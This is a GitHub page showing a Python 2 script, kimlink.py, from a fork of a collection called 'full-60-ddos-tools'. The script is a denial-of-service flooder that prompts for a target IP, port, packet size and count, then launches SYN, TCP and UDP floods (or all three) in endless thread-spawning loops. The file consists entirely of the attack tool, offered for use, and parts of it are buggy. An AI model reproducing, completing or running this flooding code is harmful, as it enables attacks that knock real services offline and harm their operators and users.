forked from lucthienphong1120/full-60-ddos-tools
-
Notifications
You must be signed in to change notification settings - Fork 0
/
kimlink.py
134 lines (128 loc) · 3.91 KB
/
kimlink.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# -#- coding: cp1258 -#-
# python ddos flooding #
# Version 1.0.0 #
# Coded by KymljnkII and Kit Hulk #
# Facebook : https://www.facebook.com/nhoc.nhi.790#
# File : kymljnkII.py #
# # # # # # # # # # # # # # # # # # # # # # # # # #
" This tool create to fjx Kymljnk mistake ! I hope you can forgive :(( "
#IMPORTS
#coding: utf-8
import random
import socket
import sys
import threading
#KYMLJNKII SYN FLOOD
class synFlood(threading.Thread):
def __init__(self, ip, port, packets):
self.ip = ip
self.port = port
self.packets = packets
self.syn = socket.socket()
threading.Thread.__init__(self)
def run(self):
for i in range(self.packets):
try:
self.syn.connect((self.ip, self.port))
except:
pass
#KYMLJNKII TCP FLOOD
class tcpFlood(threading.Thread):
def __init__(self, ip, port, size, packets):
self.ip = ip
self.port = port
self.size = size
self.packets = packets
self.tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
threading.Thread.__init__(self)
def run(self):
for i in range(self.packets):
try:
bytes = random._urandom(self.size)
socket.connect(self.ip, self.port)
socket.setblocking(0)
socket.sendto(bytes,(self.ip, self.port))
except:
pass
#KYMLJNKII UDP FLOOD
class udpFlood(threading.Thread):
def __init__(self, ip, port, size, packets):
self.ip = ip
self.port = port
self.size = size
self.packets = packets
self.udp = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
threading.Thread.__init__(self)
def run(self):
for i in range(self.packets):
try:
bytes = random._urandom(self.size)
if self.port == 0:
self.port = random.randrange(1, 65535)
self.udp.sendto(bytes,(self.ip, self.port))
except:
pass
#Main
print(" .----. KymLjnkII - Con nuoi cua KitHulk - Ver 1.0 .----. ")
print(".-. Chon cac type: syn, tcp, udp, stu. Nhan Ctr-C de Stop Attack -.")
#Input gia tri vao
#Type
type = raw_input("Type: ")
#IP
ip = raw_input("IP: ")
#Port
port = raw_input("Port: ")
#Size
size = '65000'
if type!='syn':
size=raw_input("Size: ")
#packets
packets = raw_input("Packets: ")
if type=='syn':
try:
dem = 0
while True:
dem = dem+1
t = synFlood(ip,port,int(packets))
t.start()
print str(dem)+' - Kymljnk II Attack SYN -->'+ip+':'+port
except:
print 'Stop!'
pass
elif type=='tcp':
try:
dem = 0
while True:
dem = dem+1
t = tcpFlood(ip,port,size,int(packets))
t.start()
print str(dem)+' - Kymljnk II Attack TCP -->'+ip+':'+port
except:
print 'Stop!'
pass
elif type=='udp':
try:
dem = 0
while True:
dem = dem+1
t = udpFlood(ip,port,size,int(packets))
t.start()
print str(dem)+' - Kymljnk II Attack UDP -->'+ip+':'+port
except:
print 'Stop!'
pass
elif type=='stu':
try:
dem = 0
while True:
dem = dem+1
syn = synFlood(ip,port,int(packets))
syn.start()
tcp = tcpFlood(ip,port,size,int(packets))
tcp.start()
udp = udpFlood(ip,port,size,int(packets))
udp.start()
print str(dem)+' - Kymljnk II Attack STU -->'+ip+':'+port
except:
print 'Stop!'
pass